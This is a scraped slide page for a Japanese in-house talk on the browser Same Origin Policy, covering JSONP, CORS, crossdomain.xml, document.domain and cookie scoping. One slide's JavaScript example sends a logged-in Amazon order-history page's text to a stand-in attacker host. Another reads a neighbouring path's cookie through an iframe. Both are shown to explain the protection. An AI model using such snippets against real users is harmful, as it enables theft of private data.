Advertisement

SOPの話

Takao Baba
BPS Inc.
Dec. 23, 2013
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話
SOPの話

Check these out next

情報セキュリティCAS 第七十九回放送用スライド
情報セキュリティCAS 第七十九回放送用スライド
Kumasan, LLC.
Play_using_Proxy
Play_using_Proxy
Kunio Miyamoto, Ph.D.
マルチデバイス時代の高速化
マルチデバイス時代の高速化
Shin Takeuchi
すぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
yoshinori matsumoto
SugarCRM meets FreeHosting
SugarCRM meets FreeHosting
Toshiya TSURU
PyCon APAC 2013 Web Secure Coding
PyCon APAC 2013 Web Secure Coding
Gouji Ochiai
セキュアプログラミング講座
セキュアプログラミング講座
minoru-ito
配布用Dotcloudによるすぐ始めるtwitterwebアプリ開発#twtr hack
配布用Dotcloudによるすぐ始めるtwitterwebアプリ開発#twtr hack
yut148atgmaildotcom
1 of 41

SOPの話

Dec. 23, 2013
Download to read offline
Technology

社内勉強会で使った資料です。 Webセキュリティの基本であるSame Origin Policyについて、少しだけ掘り下げてみました。

Takao Baba
BPS Inc.
Advertisement
Advertisement
Advertisement

Recommended

Play_using_ProxyPlay_using_Proxy
Play_using_ProxyKunio Miyamoto, Ph.D.564 views80 slides
Webセキュリティと W3CとIETFの仕様Webセキュリティと W3CとIETFの仕様
Webセキュリティと W3CとIETFの仕様yuki-f4.4K views24 slides
Htaccessで困るHtaccessで困る
Htaccessで困るdenet19993.7K views16 slides
ITPと、その他cookie関連のこと / ITP and cookieITPと、その他cookie関連のこと / ITP and cookie
ITPと、その他cookie関連のこと / ITP and cookie株式会社MonotaRO Tech Team835 views24 slides
Webアプリ開発者のためのHTML5セキュリティ入門Webアプリ開発者のためのHTML5セキュリティ入門
Webアプリ開発者のためのHTML5セキュリティ入門Muneaki Nishimura44.9K views71 slides
ブラウザとWebサーバとXSSの話@Shibuya.xssブラウザとWebサーバとXSSの話@Shibuya.xss
ブラウザとWebサーバとXSSの話@Shibuya.xssToshiharu Sugiyama4.1K views15 slides

More Related Content

Similar to SOPの話(20)

情報セキュリティCAS 第七十九回放送用スライド情報セキュリティCAS 第七十九回放送用スライド
情報セキュリティCAS 第七十九回放送用スライド
Kumasan, LLC.216 views
Play_using_ProxyPlay_using_Proxy
Play_using_Proxy
Kunio Miyamoto, Ph.D.7.2K views
マルチデバイス時代の高速化マルチデバイス時代の高速化
マルチデバイス時代の高速化
Shin Takeuchi2.2K views
すぐできるWeb制作時のセキュリティTipsすぐできるWeb制作時のセキュリティTips
すぐできるWeb制作時のセキュリティTips
yoshinori matsumoto10.2K views
SugarCRM meets FreeHostingSugarCRM meets FreeHosting
SugarCRM meets FreeHosting
Toshiya TSURU1.5K views
PyCon APAC 2013 Web Secure CodingPyCon APAC 2013 Web Secure Coding
PyCon APAC 2013 Web Secure Coding
Gouji Ochiai2.1K views
セキュアプログラミング講座セキュアプログラミング講座
セキュアプログラミング講座
minoru-ito2K views
配布用Dotcloudによるすぐ始めるtwitterwebアプリ開発#twtr hack配布用Dotcloudによるすぐ始めるtwitterwebアプリ開発#twtr hack
配布用Dotcloudによるすぐ始めるtwitterwebアプリ開発#twtr hack
yut148atgmaildotcom912 views
【19-C-L】Web開発者ならおさえておきたい「常時SSL/TLS化の実装ポイント」【19-C-L】Web開発者ならおさえておきたい「常時SSL/TLS化の実装ポイント」
【19-C-L】Web開発者ならおさえておきたい「常時SSL/TLS化の実装ポイント」
Developers Summit3.2K views
Webクローリング&スクレイピングの最前線 公開用Webクローリング&スクレイピングの最前線 公開用
Webクローリング&スクレイピングの最前線 公開用
Lumin Hacker78.3K views
脆弱性事例に学ぶセキュアコーディング「SSL/TLS証明書検証」編 (KOF2014)脆弱性事例に学ぶセキュアコーディング「SSL/TLS証明書検証」編 (KOF2014)
脆弱性事例に学ぶセキュアコーディング「SSL/TLS証明書検証」編 (KOF2014)
JPCERT Coordination Center11.5K views
Pony concurrency built into the type systemPony concurrency built into the type system
Pony concurrency built into the type system
matsu_chara 6.2K views
少しでもセキュリティを向上させたい! Mauticの運用方法少しでもセキュリティを向上させたい! Mauticの運用方法
少しでもセキュリティを向上させたい! Mauticの運用方法
Jun Katayama2.1K views
今日からはじめるCSP(Kernel/VM@Okinawa)今日からはじめるCSP(Kernel/VM@Okinawa)
今日からはじめるCSP(Kernel/VM@Okinawa)
cocoa_dahlia7.5K views
クラウド移行で解決されるセキュリティとリスク 公開用クラウド移行で解決されるセキュリティとリスク 公開用
クラウド移行で解決されるセキュリティとリスク 公開用
Lumin Hacker841 views
WTM52 あなたの作ったWEBサイト、生きてますか?WTM52 あなたの作ったWEBサイト、生きてますか?
WTM52 あなたの作ったWEBサイト、生きてますか?
Masanori Oobayashi1.6K views
OCamlでWebアプリケーションを作るn個の方法OCamlでWebアプリケーションを作るn個の方法
OCamlでWebアプリケーションを作るn個の方法
Hiroki Mizuno10.7K views
20140903groonga発表資料20140903groonga発表資料
20140903groonga発表資料
Hironobu Saitoh1.3K views
Webサーバ、HTMLWebサーバ、HTML
Webサーバ、HTML
Shuhei Iitsuka1.6K views
Wight: Phantom’s Perl friend - YAPC::Asia 2012Wight: Phantom’s Perl friend - YAPC::Asia 2012
Wight: Phantom’s Perl friend - YAPC::Asia 2012
Hiroshi Shibamura10.1K views

Recently uploaded(20)

Oracle Cloud Infrastructure:2023年5月度サービス・アップデートOracle Cloud Infrastructure:2023年5月度サービス・アップデート
Oracle Cloud Infrastructure:2023年5月度サービス・アップデート
オラクルエンジニア通信25 views
TestSIP (1).pdfTestSIP (1).pdf
TestSIP (1).pdf
DeependraSingh7128590 views
統計学の攻略_推測統計学の考え方.pdf統計学の攻略_推測統計学の考え方.pdf
統計学の攻略_推測統計学の考え方.pdf
akipii Oga0 views
☀️【卡尔顿大学毕业证成绩单留学生首选】☀️【卡尔顿大学毕业证成绩单留学生首选】
☀️【卡尔顿大学毕业证成绩单留学生首选】
15sad2 views
Üslup ve tercüme.pdfÜslup ve tercüme.pdf
Üslup ve tercüme.pdf
1Hmmtks2 views
ペンタエリスリトール市場.pdfペンタエリスリトール市場.pdf
ペンタエリスリトール市場.pdf
HinaMiyazu3 views
突如登場したAzure Developer CLIでなにができるのか?検証してみる突如登場したAzure Developer CLIでなにができるのか?検証してみる
突如登場したAzure Developer CLIでなにができるのか?検証してみる
Kazumi IWANAGA27 views
①【阳光海岸大学毕业证文凭学位证书|工艺完美复刻】①【阳光海岸大学毕业证文凭学位证书|工艺完美复刻】
①【阳光海岸大学毕业证文凭学位证书|工艺完美复刻】
vgh215w2 views
留信网认证可查【皇家霍洛威学院文凭证书毕业证购买】留信网认证可查【皇家霍洛威学院文凭证书毕业证购买】
留信网认证可查【皇家霍洛威学院文凭证书毕业证购买】
32lkhng2 views
点群SegmentationのためのTransformerサーベイ点群SegmentationのためのTransformerサーベイ
点群SegmentationのためのTransformerサーベイ
Takuya Minagawa10 views
UAV写真・レーザー測量test.pptxUAV写真・レーザー測量test.pptx
UAV写真・レーザー測量test.pptx
ssuserb48d2b113 views
第2回Matlantis User Conference_20230421_畠山歓先生第2回Matlantis User Conference_20230421_畠山歓先生
第2回Matlantis User Conference_20230421_畠山歓先生
Matlantis 356 views
20230516 @Mix Leap Hirohiko_Suwa20230516 @Mix Leap Hirohiko_Suwa
20230516 @Mix Leap Hirohiko_Suwa
Masashi Nakagawa82 views
本科/硕士《加拿大温莎大学毕业证成绩单》本科/硕士《加拿大温莎大学毕业证成绩单》
本科/硕士《加拿大温莎大学毕业证成绩单》
1523dsa2 views
SoftwareControl.pdfSoftwareControl.pdf
SoftwareControl.pdf
ssusercd992815 views
留信网认证可查【拜欧拉大学文凭证书毕业证购买】留信网认证可查【拜欧拉大学文凭证书毕业证购买】
留信网认证可查【拜欧拉大学文凭证书毕业证购买】
1lkjhg3 views
OmnisOmnis
Omnis
DaisukeFujita1010 views
ChatGPT以後の時代をどう生きるか PWA Night vol.51ChatGPT以後の時代をどう生きるか PWA Night vol.51
ChatGPT以後の時代をどう生きるか PWA Night vol.51
hedachi55 views
統計学の攻略_統計的仮説検定の9パターン.pdf統計学の攻略_統計的仮説検定の9パターン.pdf
統計学の攻略_統計的仮説検定の9パターン.pdf
akipii Oga0 views
シン3次元表示装置 ーその1ーシン3次元表示装置 ーその1ー
シン3次元表示装置 ーその1ー
Takashi Yamanoue121 views
Advertisement

SOPの話

  1. SOPの話 2013/11/14
  2. おまえは誰だ
  3. まずは超おさらい
  4. SOPって何だ
  5. SOPとは • Same Origin Policy • 同一生成元ポリシー 現在のWebセキュリティの中心をなす考え方
  6. SOPとは $.get(‘http://www.bpsinc.jp/feed.xml’); <iframe src=http://www.bpsinc.jp id=“iframe”></iframe> var doc = document.getElementById('iframe').contentDocument; console.log(doc.getElementsByTagName(‘p’)*0].innerHTML);
  7. SOPってなにものだ 「悪いサイトにアクセスしただけで、攻撃受けた」 を防ぐサンドボックスもどき 前提事項 • ユーザはそれほど賢くない • 悪意のあるサイトにもアクセスしちゃう • ユーザはそれほど馬鹿じゃない • 警告を無視してほいほいクリックとかしないだろう • ブラウザは完璧に違いない • まともなサイトには、まともなコンテンツしか置 いていないに違いない
  8. SOPって結局なにものだ • ユーザの情報を守るための、ブラウザのセキュ リティ機能 • サーバのセキュリティ対策にはならない • たとえばDDoSへの効果は無い • ブラウザプラグインは迂回できる
  9. SOPが無いとどうな る 邪魔くさいからいらないんじゃないか
  10. いいことたくさん • JavaScriptだけでRSSリーダーが作れる! • Twitterの埋め込みタイムライン(iframe)のデ ザインをいじれる! 自由にカスタムしたい
  11. いいことたくさん...? <iframe id=‚iframe‛ src=https://www.amazon.co.jp/gp/css /order-history...></iframe> var doc = document.getElementById(‘iframe’).c ontentDocument; var text = $(doc).text(); $.post( ‘http://crackerssite.example.com’, { data: text } );
  12. よくなかった 同じブラウザでログインしている すべてのサイトを 自由に操作される
  13. 何を制限してるのか
  14. SOPの影響を受けるもの • JavaScriptのXMLHttpRequest • Flashのリクエスト • JavaScriptからiframeへのアクセス • JavaScriptからcanvasへのアクセス • WebStorage • X-Frame-Options • Cookie • Basic/Digest認証 もっと複雑 ※他にもあります
  15. JavaScriptからcanvasへの アクセス var img = new Image(); img.src = ‘http://example.com/secretimg.png’; img.onload = function() { var canvas = $('canvas')[0]; var ctx = canvas.getContext('2d'); ctx.drawImage(img, 0, 0); var data = ctx.createImageData(50, 50); }
  16. file:// プロトコル • Chrome, Safari • XHR禁止 • Firefox • サブディレクトリ許可 • Downloadsディレクトリ危ない • IE7~ • JavaScript実行に警告 • IE6 • なにそれおいしいの
  17. SOPを回避する技術 だって別のサーバと通信したい
  18. JSONP • サーバが関数呼び出し形式でレスポンスを返す • まさか、認証が必要な機密情報をホイホイ JSONPで返す馬鹿なAPI開発者はいないだろう // 呼び出し側がやること <script src=‚http://api.example.com/action?callback=hello‛></script> <script> function hello(data) { </script> // サーバが返す内容 hello(‚API Response‛); alert(data); }
  19. Flash + crossdomain.xml • サーバに、アクセス許可ポリシを置いておく • Flashはそれがあるサーバにはアクセスして良 い • まさか、深く考えずに全許可とかする馬鹿な Webアプリ開発者はいないだろう <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
  20. デスクトップアプリ、 Android/iOSアプリ、ブラウザア ドオン • 何でもできる • まさか、深く考えずにインストールする馬鹿な ユーザはいないだろう
  21. CORS • Cross Origin Resource Sharing • XMLHttpRequest Level 2 • ブラウザは試しにアクセスしてみる • サーバがAccess-Control-Allow-Originヘッダなどを返 す • ブラウザは、ヘッダを見てアクセスOKなら処理続 行 • ブラウザは、ヘッダを見てアクセスNGなら処理中 止 • サーバ、クライアント両方対応が必要 • Opera, IEは非対応
  22. Reverse Proxy ※回避してない 説明いらないですよね
  23. ところでSame Originって
  24. 何をもって「Same」? http://bps:password@s1.example.com:80/path/index.html?q=p#sec1 • プロトコル • ドメイン名 • FQDN • 認証情報 • ポート番号 • IPアドレス • パス
  25. 何をもって「Same」? http://bps:password@s1.example.com:80/path/index.html?q=p#sec1 • プロトコル • ドメイン名 • FQDN • 認証情報 • ポート番号 • IPアドレス • パス IPアドレスは見ない! httpとhttpsは区別される!
  26. だが しかし! • 例外1 • document.domain • 例外2 • Cookie
  27. document.domain // login.example.comで以下のJavaScriptを実行 documnet.domain = ‘example.com’; // mypage.example.comで以下のJavaScriptを実行 document.domain = ‘example.com’; ↓ 2つのサイトでJavaScript操作ができる! 制限を緩くする機能 document.domain = ‘verisign.com’; // さすがにエラーです documnet.domain = ‘com’; // 攻撃され放題です
  28. Cookie • デフォルトではhttpとhttpsで共有される • secureを付けるとhttpsでのみ送信される • path指定で、送信範囲を狭くすることができる • セキュリティを向上・・・? • domain指定で、送信範囲を広くすることがで きる • サブドメイン間で共有
  29. Cookie: path 共用ホームページサーバで使われている (http://example.com/) Set-Cookie: SessionID=12345; path=/yamada http://example.com/ => Cookieが送信されない http://example.com/tanaka => Cookieが送信されない http://example.com/yamada => Cookieが送信される
  30. Cookie: path 実は、セキュリティ上全く意味が無い (http://example.com/cracksite) iframeはpathではなくOriginで判断! <iframe id=‚iframe‛ src=‚http://example.com/yamada‛></iframe> <script> var doc = document.getElementById(‘iframe’).contentDocument; var cookie = doc.cookie </script> フォルダ名で分ける共用サーバを使うのはやめましょう。 信頼できない人に特定フォルダ以下にスクリプト置かせるのもやめましょ ※httpOnlyで多少は緩和できる
  31. Cookie: domain (http://foo.example.com/) Set-Cookie: SessionID=12345; domain=?????? 設定する値 有効範囲 (未指定) foo.example.com ← いちばん限定される bar.foo.example.com Cookieは設定されない hoge.example.com Cookieは設定されない foo.example.com *.foo.example.com ← 未指定より広くなる example.com *.example.com ← いちばん広くなる google.com Cookieは設定されない .com Cookieは設定されない ← トップレベルは設定不可 指定するとセキュリティ下がりやすい。必要ないなら指定しない。
  32. Cookie: domain (http://foo.example.com/) Set-Cookie: SessionID=12345; domain=?????? 設定する値 有効範囲 (未指定) foo.example.com ← いちばん限定される bar.foo.example.com Cookieは設定されない hoge.example.com Cookieは設定されない foo.example.com *.foo.example.com ← 未指定より広くなる example.com *.example.com ← いちばん広くなる google.com Cookieは設定されない .com Cookieは設定されない ← トップレベルは設定不可 これはどうやって判別してるのか?
  33. Cookie: domain Only hosts within the specified domain can set a cookie for a domain and domains must have at least two (2) or three (3) periods in them to prevent domains of the form: ".com", ".edu", and "va.us". Any domain that fails within one of the seven special top level domains listed below only require two periods. Any other domain requires at least three. The seven special top level domains are: "COM", "EDU", "NET", "ORG", "GOV", "MIL", and "INT". http://curl.haxx.se/rfc/cookie_spec.html
  34. Cookie: domain 特定されたドメイン内のホストだけは、一つの ドメインに対してクッキーを設定することがで きます。そして、ドメインは、".com", ".edu", "va.us"のような形式のドメインを除いて、ドメ イン名の中に少なくとも2つか3つのピリオド を含んでいなければいけません。以下に示す7 つの特別なトップレベルドメインに含まれない ドメインのうち、いくつかは2つのピリオドが 必要となり、それ以外のドメインは、少なくと も3つ必要です。7つの特別なトップレベルド メインは、次のとおりです。:"COM", "EDU", http://www.futomi.com/lecture/cookie/specification.html "NET", "ORG", "GOV", "MIL", "INT"
  35. Cookie: domain そんなわけがない
  36. Cookie: domain ドメインの例 Suffixの長さ example.com 1 example.jp 1 example.co.jp 2 example.tokyo.jp 2 example.machida.tokyo.jp 3 example.machida.kanagawa.jp 2 example.yokohama.jp 2 example.city.yokohama.jp 3 example. a.ssl.fastly.net 4 http://publicsuffix.org/
  37. Cookie: domain 7233行 2013年11月現在 こんなリストをMozillaとかが地道に作っている
  38. Cookie: domain Chromeのソースで も見てみよう net/base/registry_controlled_ domains/effective_tld_names. cc http://git.chromium.org/gitwe b/?p=chromium.git;a=blob;f=n et/base/registry_controlled_d omains/effective_tld_names.c c;h=074a031708d21fa7adb8c b6fca3b70d69c866bcc;hb=HE AD
  39. Cookie: domain Chromeのバイナリでも見て みよう %USERPROFILE%AppDataLo calGoogleChromeApplicatio n30.0.1599.101chrome.dll
  40. まとめ
  41. まとめ • CORSによって、Webのセキュリティは保たれ ている • 考え方はとてもシンプル • 同一生成元は信頼できる • 実際はとても複雑 • それがWebの歴史です 超おすすめ
Advertisement